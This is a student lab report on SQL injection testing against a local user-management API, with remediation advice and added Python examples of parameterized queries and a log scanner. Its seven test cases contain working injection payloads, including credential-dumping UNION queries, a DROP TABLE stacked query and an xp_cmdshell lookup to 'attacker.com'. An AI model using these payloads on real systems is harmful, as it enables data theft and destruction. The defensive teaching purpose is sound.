
AAiT

Software Engineering Software security


SQL Injection Lab

PREPARED BY:

1. Biruk Worku ID: UGR/8359/13
2. Birhan Aschalew ID: UGR/9050/13
3. Natnael Dejene ID: UGR/4254/13
4. Rahel Solomon ID: UGR/9946/13
5. Yeabsra Aemro ID: UGR/5733/12

Submitted to: Dr. Seleshi
Submission Date: Nov 30, 2024

SQL Injection Vulnerability Report

Overview
This report highlights vulnerabilities identified in a user management application due to
improper handling of SQL queries. They include Classic SQL Injection (Tautology-Based)
and Union-Based SQL Injection, among others; all of them exploit unsafe query
construction and enable attackers to manipulate or retrieve unauthorized data from the
database.

1. Classic SQL Injection (Tautology-Based)


Description:
This type of attack manipulates the SQL query by injecting a tautology, such as '1'='1'.
The tautology always evaluates to true, enabling attackers to bypass filtering conditions
and retrieve unauthorized data.
Test Case 1: Tautology-based SQL Injection in getUsersByNameUnsafe
Method: GET
URL: http://localhost:8089/api/users?name=' OR '1'='1
Expected SQL Query:
SELECT u FROM User u WHERE u.name = '' OR '1'='1'
Test Result:
Observed Behavior: The query returns all users from the database. Since the tautology
'1'='1' is always true, the filtering condition is bypassed.
Impact: An attacker can retrieve all user records without authorization, which may
expose sensitive user information.
Risk Level: High
2. Union-based SQL Injection

Description:
Union-based SQL injection combines the results of two or more queries. An attacker can
leverage this technique to retrieve sensitive data from unrelated database tables by
merging it with the results of a legitimate query.

Test Case 2: Union-based SQL Injection in getUsersByNameUnsafe


Method: GET
URL: http://localhost:8089/api/users?name=' UNION SELECT null, username, password FROM user--
Expected SQL Query:
SELECT * FROM user WHERE name = '' UNION SELECT null, username, password FROM user--
Test Result:

Observed Behavior:
The query attempts to merge data from the users table with data from another table
containing sensitive fields (username and password).
If the database structure and permissions allow it, this query may expose sensitive
information such as usernames and passwords.
Impact:
Potential data breach exposing credentials and other sensitive user information.
Could allow attackers to gain unauthorized access to the system.
Risk Level: Critical

3. Error-Based SQL Injection


Description:
Error-based SQL injection relies on forcing the database to generate an error message that
leaks sensitive information about the database schema or query logic.

Test Case 3: Error-Based SQL Injection in getUsersByNameUnsafe


Method: GET
URL: http://localhost:8089/api/users?name=' OR 1=CONVERT(int, (SELECT @@version))--
Expected SQL Query:
SELECT u FROM User u WHERE u.name = '' OR 1=CONVERT(int, (SELECT @@version))--
Test Result:
Observed Behavior:
The query forces an error by attempting an invalid data type conversion or using an
incorrect function. The error message returned by the database reveals the database
version or other sensitive information.
Impact: Leaks critical details about the database (e.g., version, vendor, schema), which
attackers can use for further exploits.
Risk Level: High

4. Boolean-Based SQL Injection


Description:
This technique relies on sending boolean conditions to observe differences in application
behavior (e.g., true vs. false).

Test Case 4: Boolean-Based SQL Injection in getUsersByNameUnsafe


Method: GET
URLs:
http://localhost:8089/api/users?name=' AND 1=1--
http://localhost:8089/api/users?name=' AND 1=2--
Expected SQL Queries:
SELECT u FROM User u WHERE u.name = '' AND 1=1--
SELECT u FROM User u WHERE u.name = '' AND 1=2--
Test Result:

Observed Behavior:
For 1=1, the query executes successfully and returns results.
For 1=2, the query executes but returns no results.
Impact: This allows attackers to infer application logic and determine whether an
injection attempt is succeeding or failing.
Risk Level: Medium
5. Time-Based Blind SQL Injection
Description:
This technique sends queries that force the database to pause for a certain period,
allowing attackers to infer vulnerabilities based on response delays.

Test Case 5: Time-Based Blind SQL Injection in getUsersByNameUnsafe


Method: GET
URL: http://localhost:8089/api/users?name='; IF(1=1) WAITFOR DELAY '00:00:05'--
Expected SQL Query:
SELECT u FROM User u WHERE u.name = ''; IF(1=1) WAITFOR DELAY '00:00:05'--
Test Result:
Observed Behavior:
The query causes the database to pause for 5 seconds before responding. If this delay
occurs, the application is vulnerable to time-based blind SQL injection.
Impact: Attackers can use this to extract sensitive data through a series of logical tests
and time delays.
Risk Level: High

6. Stacked Queries SQL Injection


Description:
Stacked queries allow attackers to execute multiple queries in a single request by
terminating the first query and appending malicious queries.

Test Case 6: Stacked Queries in createUserUnsafe


Method: POST
URL: http://localhost:8089/api/users
Body:
{
  "name": "'; DROP TABLE users;--",
  "email": "[email protected]"
}
Expected SQL Query:
INSERT INTO users (name, email) VALUES (''; DROP TABLE users;--', '[email protected]')
Test Result:

Observed Behavior:
If the application is vulnerable, the injected query drops the users table, resulting in
irreversible data loss.
If the database rejects stacked queries, an error will occur, but the vulnerability still
exists.
Impact: Attackers can execute multiple malicious queries, such as deleting tables, altering
schema, or creating unauthorized users.
Risk Level: Critical

7. Out-of-Band SQL Injection


Description:
Out-of-band SQL injection uses additional communication channels (e.g., DNS or HTTP)
to extract data. This requires the attacker to have control over the external service used
for data extraction.

Test Case 7: Out-of-Band SQL Injection in getUsersByNameUnsafe


Method: GET
URL: http://localhost:8089/api/users?name='; EXEC xp_cmdshell('nslookup attacker.com')--
Expected SQL Query:
SELECT u FROM User u WHERE u.name = ''; EXEC xp_cmdshell('nslookup attacker.com')--
Test Result:

Observed Behavior:
The query executes a system command (nslookup) that attempts to resolve attacker.com,
sending data to the attacker's server.
If the database allows system commands, this can be exploited to extract sensitive data or
compromise the server.
Impact: Attackers can extract data without directly viewing responses in the application,
making detection harder.
Risk Level: Critical

General Recommendations
1. Use Parameterized Queries or ORM Frameworks:
Avoid direct string concatenation in SQL queries. Use prepared statements or ORM
frameworks like JPA or Hibernate, which bind parameters separately from the query text so
that user input is never interpreted as SQL.
Example:
@Query("SELECT u FROM User u WHERE u.name = :name")
List<User> findUsersByName(@Param("name") String name);
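The tautology from test case 1, the stacked query from test case 6 and the parameterized form recommended here, side by side in an added example that is not the report's own code: Python with an in-memory SQLite database stands in for the Java/JPA service, and the table name, column names and sample rows are constructed for this page.

```python
import sqlite3

# Constructed sample rows standing in for the lab's user table (added example, not the report's code).
SAMPLE_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]

def open_db():
    """In-memory SQLite database with a users table, so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)", SAMPLE_USERS)
    return conn

def get_users_by_name_unsafe(conn, name):
    """Mirrors getUsersByNameUnsafe: the request value is pasted into the query text."""
    sql = "SELECT id, name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def get_users_by_name_safe(conn, name):
    """Parameterized form: the driver binds the value, so quotes inside it stay data."""
    return conn.execute("SELECT id, name, email FROM users WHERE name = ?", (name,)).fetchall()

def create_user_unsafe(conn, name, email):
    """Mirrors createUserUnsafe. Returns 'executed', or 'rejected' if the driver refused the SQL."""
    sql = "INSERT INTO users (name, email) VALUES ('" + name + "', '" + email + "')"
    try:
        conn.execute(sql)
        return "executed"
    except sqlite3.Error:
        # sqlite3 runs one statement per execute() and the first statement is now malformed, so the
        # stacked DROP never runs here; the code stays injectable wherever stacked statements are accepted.
        return "rejected"

def create_user_safe(conn, name, email):
    """Parameterized insert: the payload is stored verbatim as a name; nothing else executes."""
    conn.execute("INSERT INTO users (name, email) VALUES (?, ?)", (name, email))
    return conn.execute("SELECT name FROM users WHERE email = ?", (email,)).fetchone()[0]

def count_users(conn):
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]

if __name__ == "__main__":
    db = open_db()
    tautology = "' OR '1'='1"
    print("unsafe:", get_users_by_name_unsafe(db, tautology))  # both rows, filter bypassed
    print("safe:  ", get_users_by_name_safe(db, tautology))    # [] - no user has that name
    print(create_user_unsafe(db, "'; DROP TABLE users;--", "eve@example.com"), count_users(db))
    print(create_user_safe(db, "'; DROP TABLE users;--", "eve@example.com"), count_users(db))
```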
2. Input Validation and Sanitization:
Validate and sanitize all user inputs before processing. Reject inputs containing SQL
keywords, special characters, or patterns likely to be malicious.
3. Least Privilege Principle:
Limit the database user’s permissions. For example, the database user should not have
permissions to execute DROP TABLE or access unrelated tables.
4. Error Handling:
Avoid exposing detailed error messages to the user. Use a generic error message and log
the details for internal debugging.
5. Use Web Application Firewalls (WAF):
Employ a WAF to monitor and block malicious requests targeting SQL injection
vulnerabilities.
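An added example, not part of the report, of the monitoring that recommendations 2 and 5 describe: a Python scanner that URL-decodes the request path of constructed access-log lines replaying the test URLs above and tags each line with the technique its payload resembles. The log lines and signature patterns are constructed for this page; signature matching of this kind can be evaded, so it is a detection aid alongside parameterized queries, not a replacement for them.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the report) replaying the lab's test URLs.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Nov/2024:10:01:02 +0300] "GET /api/users?name=alice HTTP/1.1" 200 73
10.0.0.5 - - [30/Nov/2024:10:01:09 +0300] "GET /api/users?name=%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 412
10.0.0.5 - - [30/Nov/2024:10:01:15 +0300] "GET /api/users?name=%27%20UNION%20SELECT%20null,%20username,%20password%20FROM%20user-- HTTP/1.1" 200 512
10.0.0.5 - - [30/Nov/2024:10:01:21 +0300] "GET /api/users?name=%27;%20IF(1=1)%20WAITFOR%20DELAY%20%2700:00:05%27-- HTTP/1.1" 500 31
10.0.0.5 - - [30/Nov/2024:10:01:30 +0300] "GET /api/users?name=%27;%20EXEC%20xp_cmdshell(%27nslookup%20attacker.com%27)-- HTTP/1.1" 500 31
"""

# One pattern per technique in the report, applied to the URL-decoded request path.
SIGNATURES = {
    "tautology": re.compile(r"'\s*OR\s*'?\d+'?\s*=\s*'?\d+", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "error_based": re.compile(r"\bCONVERT\s*\(|@@version", re.I),
    "boolean": re.compile(r"'\s*AND\s*\d+\s*=\s*\d+", re.I),
    "time_based": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked": re.compile(r";\s*(DROP|EXEC|INSERT|UPDATE|DELETE)\b", re.I),
    "oob": re.compile(r"\bxp_cmdshell\b", re.I),
}

# Request line inside a Common Log Format entry: "GET /path HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def classify_request(path):
    """Return the names of all signatures matching the decoded path and query string."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Return (decoded_path, [signature names]) for each log line that trips a signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        tags = classify_request(m.group("path"))
        if tags:
            hits.append((unquote_plus(m.group("path")), tags))
    return hits

if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(", ".join(tags).ljust(16), path)
```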
Conclusion
The vulnerabilities identified in this application are severe and can lead to unauthorized
data access, credential leaks, and potentially complete database compromise. Immediate
steps should be taken to remediate these vulnerabilities by implementing secure coding
practices, validating user inputs, and employing parameterized queries.
